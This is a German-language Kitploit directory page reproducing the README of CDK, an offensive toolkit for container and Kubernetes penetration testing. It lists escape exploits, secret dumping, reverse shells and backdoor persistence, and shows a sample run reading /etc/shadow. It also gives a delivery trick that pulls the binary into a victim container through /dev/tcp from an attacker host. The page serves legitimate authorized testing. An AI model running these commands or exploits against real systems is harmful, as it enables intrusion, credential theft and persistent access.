Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CDK — 📦 Erleichtern Sie die Sicherheitstests von K8s, Docker und Containerd. | Kitploit
Tools/GitHubGitHub/cdk-team/cdk
Privilege EscalationAufklärungContainer-SicherheitPersistenzmechanismenExploitationLaterale BewegungPost-ExploitationPenetrationstestsCloud-SicherheitContainer-Ausbruch
GitHubcdk-team/cdk

CDK

4.7k606vor 3 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

📦 Erleichtern Sie die Sicherheitstests von K8s, Docker und Containerd.

Repository anzeigenWebseite

CDK - Toolkit für Container-Penetration ohne Abhängigkeiten

English | 简体中文

png

Rechtlicher Hinweis

Die Nutzung von CDK zum Angriff auf Ziele ohne vorherige gegenseitige Zustimmung ist illegal. CDK dient ausschließlich Sicherheitstestzwecken.

Überblick

CDK ist ein quelloffenes Toolkit für Container-Penetration, das für stabile Ausnutzung in verschiedenen abgespeckten Containern ohne Betriebssystemabhängigkeiten entwickelt wurde. Es enthält nützliche Netzwerktools und viele leistungsstarke PoCs/Exploits und hilft Ihnen, Container zu entkommen und K8s-Cluster einfach zu übernehmen.

Schnellstart

Führen Sie cdk eva aus, um Bewertungsinformationen und einen empfohlenen Exploit zu erhalten, und führen Sie dann cdk run aus, um den Angriff zu starten.

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Auslieferung

Laden Sie die neueste Version unter https://github.com/cdk-team/CDK/releases/ herunter.

Legen Sie die ausführbaren Dateien in den Zielcontainer und starten Sie die Tests.

TIPPS: Auslieferung von CDK in den Zielcontainer bei realen Penetrationstests

Wenn Sie einen Exploit haben, der eine Datei hochladen kann, können Sie das CDK-Binary direkt hochladen.

Wenn Sie einen RCE-Exploit haben, aber der Zielcontainer kein curl oder wget besitzt, können Sie CDK mit der folgenden Methode ausliefern:

  1. Hosten Sie zunächst das CDK-Binary auf Ihrem Host mit öffentlicher IP.
root@kitploit:~
(auf Ihrem Host)
nc -lvp 999 < cdk
  1. Führen Sie im Opfercontainer Folgendes aus:
root@kitploit:~
cat < /dev/tcp/(Ihre_öffentliche_Host_IP)/(Port) > cdk
chmod a+x cdk

Verwendung

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

Funktionen

CDK besteht aus drei Modulen:

  1. Evaluate: Sammelt Informationen im Container, um potenzielle Schwachstellen zu finden.
  2. Exploit: Für Container Escape, Persistenz und laterale Bewegung.
  3. Tool: Netzwerktools und APIs für TCP/HTTP-Anfragen, Tunnel und K8s-Cluster-Management.

Evaluate-Modul

Verwendung

root@kitploit:~
cdk evaluate [--full]

Exploit-Modul

Liste aller verfügbaren Exploits:

root@kitploit:~
cdk run --list

Gezielten Exploit ausführen:

root@kitploit:~
cdk run <script-name> [options]

Anmerkung zu Thin: Die Thin-Version ist für kurzlebige Container-Shells wie Serverless-Funktionen vorbereitet. Wir haben Build-Tags im Quellcode hinzugefügt und einige Exploits entfernt, um das Binary leichter zu machen. Die 2-MB-Datei enthält 90% der CDK-Funktionen. Sie können auch nützliche Exploits aus dem CDK-Quellcode auswählen, um Ihr eigenes leichtgewichtiges Binary zu erstellen.

Tool-Modul

Befehle wie unter Linux ausführen, Unterschiede in den Eingabeargumenten – siehe Verwendungslink.

root@kitploit:~
cdk nc [options]
cdk ps

Release-Dokument

Wenn Sie wissen möchten, wie wir eine neue Version veröffentlicht haben, wie Thin erstellt wird, warum wir UPX-Versionen anbieten, welche Unterschiede zwischen den verschiedenen Versionen (all, normal, thin, upx) bestehen und wie Sie bestimmte CDK-Exploits und -Tools auswählen, um ein eigenes Release zu kompilieren, lesen Sie bitte das Release-Dokument.

Entwicklerdokumentation

  • Test im Container ausführen

Mitwirken an CDK

Zunächst einmal: Danke, dass Sie sich die Zeit nehmen, mitzuwirken!

Danke an die folgenden Mitwirkenden:

Weitere Mitwirkende: Liste der Mitwirkenden

Fehler melden

Fehler werden als GitHub Issues erfasst. Erstellen Sie ein Issue mit der aktuellen CDK-Version, der Fehlermeldung und der Umgebung. Beschreiben Sie die genauen Schritte, die das Problem reproduzieren.

Verbesserungsvorschläge

Verbesserungsvorschläge werden als GitHub Discussions erfasst. Sie können hier Gedanken veröffentlichen, um direkt mit Entwicklern zu diskutieren.

Pull Requests

Beheben Sie Probleme oder erhalten Sie die Qualität von CDK:

  • Beschreiben Sie die aktuelle CDK-Version, die Umgebung, das Problem und die genauen Schritte zur Reproduktion.
  • Screenshots oder Logs vor und nach der Fehlerbehebung.

Neue Funktionen oder Exploits:

  • Erklären Sie, warum diese Verbesserung für andere Benutzer nützlich wäre.
  • Bitte schaffen Sie eine nachhaltige Umgebung, damit wir Beiträge überprüfen können.
  • Screenshots, wie diese neue Funktion funktioniert.
  • Wenn Sie ein neues Evaluate- oder Exploit-Skript einreichen, fügen Sie bitte eine kurze Dokumentation zu Ihrer PR-Nachricht hinzu. Hier ist ein Beispiel.

Veranstaltungen

404StarLink 2.0 - Galaxy

png

Das CDK-Projekt ist jetzt im Starlink Project 2.0 des 404Teams enthalten. Treten Sie der StarLink-Community bei, um mit dem CDK-Entwicklungsteam in Kontakt zu treten.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • Briefing: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes Community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
Tool herunterladen
TaktikSkriptUnterstütztVerwendung/Beispiel
InformationssammlungOS-Grundinformationen✔Link
InformationssammlungVerfügbare Capabilities✔Link
InformationssammlungVerfügbare Linux-Befehle✔Link
InformationssammlungMounts✔Link
InformationssammlungNet Namespace✔Link
InformationssammlungSensitive ENV✔Link
InformationssammlungSensitive Prozesse✔Link
InformationssammlungSensitive lokale Dateien✔Link
InformationssammlungKube-proxy Route Localnet (CVE-2020-8558)✔Link
InformationssammlungDNS-basierte Service-Discovery✔Link
DiscoveryK8s Api-Server-Informationen✔Link
DiscoveryK8s Service-Account-Informationen✔Link
DiscoveryCloud-Provider-Metadaten-API✔Link
TaktikTechnikCDK-Exploit-NameUnterstütztIn ThinDokumentation
Escapingdocker-runc CVE-2019-5736runc-pwn✔✔
Escapingcontainerd-shim CVE-2020-15257shim-pwn✔Link
Escapingdocker.sock PoC (DIND-Angriff)docker-sock-check✔✔Link
Escapingdocker.sock RCEdocker-sock-pwn✔✔Link
EscapingDocker-API (2375) RCEdocker-api-pwn✔✔Link
EscapingDevice-Mount-Escapingmount-disk✔✔Link
EscapingLXCFS-Escapinglxcfs-rw✔✔Link
EscapingCgroups-Escapingmount-cgroup✔✔Link
EscapingMissbrauch von nicht privilegierten User Namespaces (CVE-2022-0492)abuse-unpriv-userns✔✔Link
EscapingProcfs-Escapingmount-procfs✔✔Link
EscapingPtrace-Escaping PoCcheck-ptrace✔✔Link
EscapingCgroup (devices.allow) überschreibenrewrite-cgroup-devices✔✔Link
EscapingBeliebige Datei vom Hostsystem lesen (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔Link
DiscoveryK8s-Komponenten-Probeservice-probe✔✔Link
DiscoveryIstio-Seitenwagen-Metadaten auslesenistio-check✔✔Link
DiscoveryK8s-Pod-Sicherheitsrichtlinien auslesenk8s-psp-dump✔Link
FernsteuerungReverse Shellreverse-shell✔✔Link
FernsteuerungKubelet Execkubelet-exec✔✔
Zugriff auf AnmeldedatenRegistry-BruteForceregistry-brute✔✔Link
Zugriff auf AnmeldedatenZugriffsschlüssel-Scanningak-leakage✔✔Link
Zugriff auf AnmeldedatenEtcd K8s-Token abrufenetcd-get-k8s-token✔✔
Zugriff auf AnmeldedatenK8s-Secrets auslesenk8s-secret-dump✔✔Link
Zugriff auf AnmeldedatenK8s-Config auslesenk8s-configmap-dump✔✔Link
PrivilegieneskalationK8s-RBAC-Bypassk8s-get-sa-token✔✔Link
PrivilegieneskalationCVE-2026-31431 copy-fail (non-root→root & nur x86_64)copy-fail-cve-2026-31431✔Link
PersistenzWebShell bereitstellenwebshell-deploy✔✔Link
PersistenzBackdoor-Pod bereitstellenk8s-backdoor-daemonset✔✔Link
PersistenzSchatten-K8s-API-Server bereitstellenk8s-shadow-apiserver✔Link
PersistenzK8s-MITM-Angriff (CVE-2020-8554)k8s-mitm-clusterip✔✔Link
PersistenzK8s-CronJob bereitstellenk8s-cronjob✔✔Link
BefehlBeschreibungUnterstütztVerwendung/Beispiel
ncTCP-Tunnel✔Link
psProzessinformationen✔Link
netstatWie Befehl "netstat -antup"✔
ifconfigNetzwerkinformationen✔Link
viDateien bearbeiten✔Link
ectlUnbefugtes Aufzählen von etcd-Schlüsseln✔
kcurlAnfrage an K8s-API-Server✔Link
dcurlAnfrage an Docker-HTTP-API✔Link
ucurlAnfrage an Docker-Unix-Socket✔Link
rcurlAnfrage an Docker-Registry-API
probeIP/Port-Scanning✔Link